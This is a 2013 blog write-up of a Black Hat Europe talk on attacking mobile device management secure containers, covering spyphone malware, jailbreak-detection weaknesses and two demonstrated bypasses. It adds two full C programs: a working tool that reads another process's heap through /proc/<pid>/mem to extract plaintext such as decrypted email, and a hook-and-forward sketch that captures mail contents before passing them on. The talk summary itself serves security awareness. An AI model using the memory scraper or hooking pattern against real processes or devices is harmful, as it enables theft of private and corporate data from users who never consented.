

BlackHatEU2013 – Day1 – Practical Attacks against MDM solutions

Good morning everyone,

Welcome to BlackHat Europe 2013 !  As announced in my post a couple of days ago, I’ll try to post short write-ups about some of the talks right after the presentation has finished.  All you have to do is keep an eye on my Twitter feed to see when a new post is available.

After enjoying breakfast with @wimremes, @xme, @chrisjohnriley, @halvarflake, @botherder, @repmovsb, @dookie, muts and some others (sorry if I forgot to mention your twitter handle), it’s time for work.   (Yes, attending conferences is not just talks in between the parties… it is hard work ! :) )

Before we begin, I would like to congratulate Offensive Security on the release of Kali Linux, the successor of BackTrack Linux. Check it out at !

The first session that I’m attending today is called “Practical Attacks against MDM solutions”, presented by Daniel Brodie and Michael Shaulov from Lacoon Mobile Security.

Daniel has been a researcher for almost a decade (PC / mobile) and has been working on a dynamic analysis framework for malware on mobile devices.  Michael is the CEO / co-founder of Lacoon and has done lots of research on feature phones and smartphones.


An MDM is a policy & configuration tool that helps enterprises manage BYOD and corporate mobile devices. In most cases, it allows separation of business and private data on these devices by using multiple containers.  Gartner states that in the next few years, 65% of enterprises will be using MDM solutions to manage their devices.

Key capabilities of an MDM solution include software management, network service management, hardware management and security management (remote wipe, enforced configurations and encryption, if the operating system allows this).  Most of these tools allow you to detect whether a device is jailbroken or not.  MobileIron/AirWatch/FiberLink/Zenprise/Good Technologies are some companies that offer MDM solutions.  Good Technologies was the company that introduced the use of secure containers, Michael says.

Secure containers are just normal applications on the device. They are designed to secure communications between the device and the company, and also provide encrypted storage (acting as a kind of sandbox, built on default OS capabilities).

Rise of the Spyphones (RAT – Remote Access/Admin Tools)

Daniel explains that these secure containers attempt to protect against malware that would turn your device into a spyphone. RAT malware targets personal data or has financial motives.   Mobile devices are a great target because they contain contacts, email and corporate information.

Malware capabilities include eavesdropping and surround recording, location tracking, extracting call/text logs, accessing the company LAN via VPN, etc.  FinSpy, DaVinci RCS, LuckyCat and Leo Impact are some examples of such tools.  Some of them start at $4.99 per month and are available for iOS, Android, BlackBerry, Windows, Symbian, etc. Some even come with professional support and are very user-friendly: “So simple even your mother can use them”. The difference between the high-end and low-end tools is mostly in the infection vector: high-end tools often use 0day vulnerabilities, while the cheaper ones use older bugs.

To see how popular these tools are, Daniel continues, they partnered with worldwide cellular network providers and sampled 250K subscribers.  They discovered that in March 2012, one out of 3000 devices was infected. In October, this number had risen to 1 out of 1000 devices, which is an alarming trend.   The majority of the infections were found on iOS (52%), in a market that is dominated by Android (51%).

Nobody seems to worry about this, because “we have a secure container” right ?

Bypassing secure container encryption capabilities

Secure containers attempt to detect jailbreaking and the installation of rogue applications, and they encrypt data.  All of this is based on functionality provided by the OS.  Most jailbreak/rooting detection mechanisms are based on publicly known routines: they usually check for the presence of artefacts such as Cydia or su, but they don't try to detect the actual exploitation.  If someone uses a custom exploit that leaves none of those artefacts behind, the jailbreak detection may not work.

The mechanisms that prevent the installation of malicious applications have been bypassed in certain cases, so this is not a foolproof protection feature either.

Michael and Daniel continue by demonstrating how the secure container on Android can be bypassed.  The technique is based on the Exynos exploit (released in December 2012), hidden inside a rogue application (pretending to be a small free game or something similar), which installs a rogue daemon that runs in the background. In the demo, Daniel shows that this daemon grabbed the contents of corporate emails and sent them to the C&C server; it listened to the event log to know when to act.   By accessing the heap of the container process (via /proc/<pid>/maps and /proc/<pid>/mem), it could extract the plaintext email contents and send them to the attacker.
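The heap-scraping step is generic Linux: walk /proc/<pid>/maps for writable private regions, then read them through /proc/<pid>/mem and search for what you want. The C program below is an added example (my own, not code from the talk or from Lacoon) that does exactly that on a stock Linux box; the marker string and the sample maps lines are constructed for the demo, and on Android the root daemon would do the same against the container app's pid after the Exynos exploit gave it the privilege to open /proc/<pid>/mem.

```c
#define _GNU_SOURCE
#define _FILE_OFFSET_BITS 64
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/types.h>

/* One parsed line of /proc/<pid>/maps. */
typedef struct {
    unsigned long long start, end;
    char perms[5];   /* e.g. "rw-p" */
    char name[128];  /* pathname or pseudo-name such as [heap]; "" when anonymous */
} MapRegion;

/* Parse "55d3e9c00000-55d3e9c21000 rw-p 00000000 00:00 0   [heap]".
 * Returns 1 on success, 0 if the line does not have that shape. */
int parse_maps_line(const char *line, MapRegion *r)
{
    unsigned long long start, end, offset;
    unsigned long inode;
    char perms[5], dev[16];
    int consumed = 0;
    if (sscanf(line, "%llx-%llx %4s %llx %15s %lu%n",
               &start, &end, perms, &offset, dev, &inode, &consumed) != 6)
        return 0;
    r->start = start;
    r->end = end;
    memcpy(r->perms, perms, sizeof r->perms);
    const char *p = line + consumed;            /* optional name after the inode */
    while (*p == ' ' || *p == '\t')
        p++;
    size_t n = strcspn(p, "\r\n");
    if (n >= sizeof r->name)
        n = sizeof r->name - 1;
    memcpy(r->name, p, n);
    r->name[n] = '\0';
    return 1;
}

/* Private, writable, anonymous or [heap] regions: where an app's decrypted
 * data (mail bodies, strings) lives. File-backed code and [stack] are skipped. */
int is_scrape_target(const MapRegion *r)
{
    if (r->perms[0] != 'r' || r->perms[1] != 'w' || r->perms[3] != 'p')
        return 0;
    return r->name[0] == '\0' || strcmp(r->name, "[heap]") == 0;
}

/* -1 = unparsable line, 0 = parsed but not a target, 1 = target. */
int classify_maps_line(const char *line)
{
    MapRegion r;
    return parse_maps_line(line, &r) ? is_scrape_target(&r) : -1;
}

/* Search the target regions of `pid` for `needle`.
 * 1 = found, 0 = memory was read and it is not there,
 * -1 = /proc/<pid>/{maps,mem} unreadable (non-Linux or no privilege). */
int scan_process_for(pid_t pid, const char *needle)
{
    char path[64];
    snprintf(path, sizeof path, "/proc/%d/maps", (int)pid);
    FILE *maps = fopen(path, "r");
    if (!maps)
        return -1;
    snprintf(path, sizeof path, "/proc/%d/mem", (int)pid);
    int mem = open(path, O_RDONLY);
    if (mem < 0) { fclose(maps); return -1; }

    enum { CHUNK = 64 * 1024 };
    size_t nlen = strlen(needle);
    char *buf = malloc(CHUNK + nlen);           /* room for chunk + carried tail */
    int found = 0, read_any = 0;
    char line[512];
    MapRegion r;
    while (!found && buf && fgets(line, sizeof line, maps)) {
        if (!parse_maps_line(line, &r) || !is_scrape_target(&r))
            continue;
        size_t carry = 0;
        for (unsigned long long off = r.start; off < r.end && !found; off += CHUNK) {
            size_t want = (size_t)(r.end - off < CHUNK ? r.end - off : CHUNK);
            ssize_t got = pread(mem, buf + carry, want, (off_t)off);
            if (got <= 0)
                break;                           /* region gone or unreadable: skip */
            read_any = 1;
            size_t have = carry + (size_t)got;
            for (size_t i = 0; i + nlen <= have; i++)
                if (memcmp(buf + i, needle, nlen) == 0) { found = 1; break; }
            /* keep the tail so a needle straddling two chunks is still seen */
            carry = (nlen > 1 && have >= nlen - 1) ? nlen - 1 : 0;
            if (carry)
                memmove(buf, buf + have - carry, carry);
        }
    }
    free(buf);
    close(mem);
    fclose(maps);
    return (!found && !read_any) ? -1 : found;
}

/* Self-test: plant a constructed marker on our own heap (standing in for a
 * decrypted mail body inside the container app) and scrape it back out. */
int plant_and_scan_self(void)
{
    static const char marker[] = "CORP-MAIL-MARKER-4f2a";   /* constructed sample */
    char *on_heap = strdup(marker);
    if (!on_heap)
        return -1;
    int rc = scan_process_for(getpid(), marker);
    free(on_heap);
    return rc;
}

int main(int argc, char **argv)
{
    int rc = (argc == 3) ? scan_process_for((pid_t)atoi(argv[1]), argv[2])   /* ./scrape <pid> <string> */
                         : plant_and_scan_self();
    printf("%s\n", rc == 1 ? "found" : rc == 0 ? "not found" : "cannot read /proc");
    return rc == 1 ? 0 : 1;
}
```

Run it with no arguments and it recovers the marker from its own heap; run it as root with a pid and a string (a known subject line, a recipient address) and it reads another process. That is the whole point of the demo: once something runs with enough privilege to open /proc/<pid>/mem, the container's "encrypted storage" is irrelevant, because the data is decrypted in memory the moment the app uses it.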

On iOS, with the Good Technologies MDM solution installed, they were also able to steal emails that were supposed to be protected by the secure container.  For the attack to work, the malicious application has to be installed first, which requires either an already jailbroken device or a signed application that performs the jailbreak itself and then hides it.  The iOS technique first loads a malicious dylib into memory (the dylib is signed; getting that done is increasingly difficult these days).  The target application was modified using Mach-O editing techniques, with scripts that re-sign the application afterwards. Hooks are then placed using the standard Objective-C runtime mechanism (method swizzling via method_setImplementation). These hooks extract the email content from the data passed to the hooked function, send it home, and then call the original function.
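The hook itself is a small, reusable pattern: save the original implementation, install a replacement that copies the arguments out and then forwards the call so the app never notices. The C program below is an added example (mine, not code from the talk) of that hook-and-forward pattern. A plain function pointer in a dispatch table stands in for the Objective-C method's IMP slot, and `set_send_mail_implementation` has the same contract as `method_setImplementation` (install the new IMP, hand back the old one); the mail routine, recipient and body are constructed for the demo.

```c
#include <stdio.h>
#include <string.h>

/* Signature of the hooked method: the container's mail-sending routine. */
typedef int (*send_mail_imp)(const char *recipient, const char *body);

/* Stand-in for the container app's real implementation (constructed sample). */
static int real_send_mail(const char *recipient, const char *body)
{
    (void)recipient;
    return (int)strlen(body);      /* pretend: bytes handed to the crypto layer */
}

/* The slot the app dispatches through; plays the role of the method's IMP
 * pointer that method_setImplementation() swaps on iOS. */
static send_mail_imp send_mail_slot = real_send_mail;

/* Attacker state: the saved original IMP and a capture buffer that stands in
 * for the upload to the C&C server. */
static send_mail_imp saved_original = NULL;
static char capture[1024];

static int hook_send_mail(const char *recipient, const char *body)
{
    /* 1. Exfiltrate: the arguments are plaintext here, before the container
     *    encrypts or transmits anything. */
    snprintf(capture, sizeof capture, "%s|%s", recipient, body);
    /* 2. Forward to the original so the app keeps working and nothing looks off. */
    return saved_original(recipient, body);
}

/* Same contract as method_setImplementation(): install the new IMP and return
 * the old one. Refuses to re-hook with the current IMP, which would otherwise
 * make the hook call itself forever. */
send_mail_imp set_send_mail_implementation(send_mail_imp new_imp)
{
    send_mail_imp old = send_mail_slot;
    if (old == new_imp)
        return old;
    saved_original = old;
    send_mail_slot = new_imp;
    return old;
}

/* Returns 1 when the hook is in place in front of the real implementation. */
int install_mail_hook(void)
{
    set_send_mail_implementation(hook_send_mail);
    return saved_original == real_send_mail && send_mail_slot == hook_send_mail;
}

/* What the container app itself calls; it never sees the swap. */
int app_send_mail(const char *recipient, const char *body)
{
    return send_mail_slot(recipient, body);
}

const char *captured_mail(void)
{
    return capture;
}

int main(void)
{
    install_mail_hook();
    int queued = app_send_mail("cfo@corp.example", "Q3 figures attached");
    printf("app saw %d bytes queued; attacker captured: %s\n", queued, captured_mail());
    return 0;
}
```

The app gets exactly the return value it expects and the attacker gets the plaintext, which is why the talk's point holds: once code runs inside the app's process, the container's encryption is applied after the interesting data has already left.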

Daniel stresses that both attacks demonstrated were not targeted against Good in any way. The exploits are generic and should work against multiple products.

In any case, secure containers rely on the integrity of the host system.  If it’s already compromised, the secure container is no longer secure.  If the host system is not compromised… the secure container doesn’t really provide added value to the end user.


Infection is inevitable, Michael explains.  MDM provides management, but not security. MDM solutions allow you to separate private data from business data and allow you to wipe the enterprise part of the devices, or provide “copy/paste” Data Loss Prevention, but that’s about it.

An MDM can act as a baseline defence in a multi-layer approach, not as the sole security layer.  Additional protection on the network layer may be required to further secure the devices (IDS/IPS on the network, forcing the use of a VPN, etc).  Michael also explains that most antivirus products are limited by the sandbox as well, so they can't really place proper hooks.  Most AVs use signature-based detection and fail at properly detecting this malware.  In fact, since some of these RAT tools claim to be legitimate applications (so you can spy on your kids, etc), they are simply whitelisted by certain AV products.



© 2013, Peter Van Eeckhoutte (corelanc0d3r). All rights reserved.

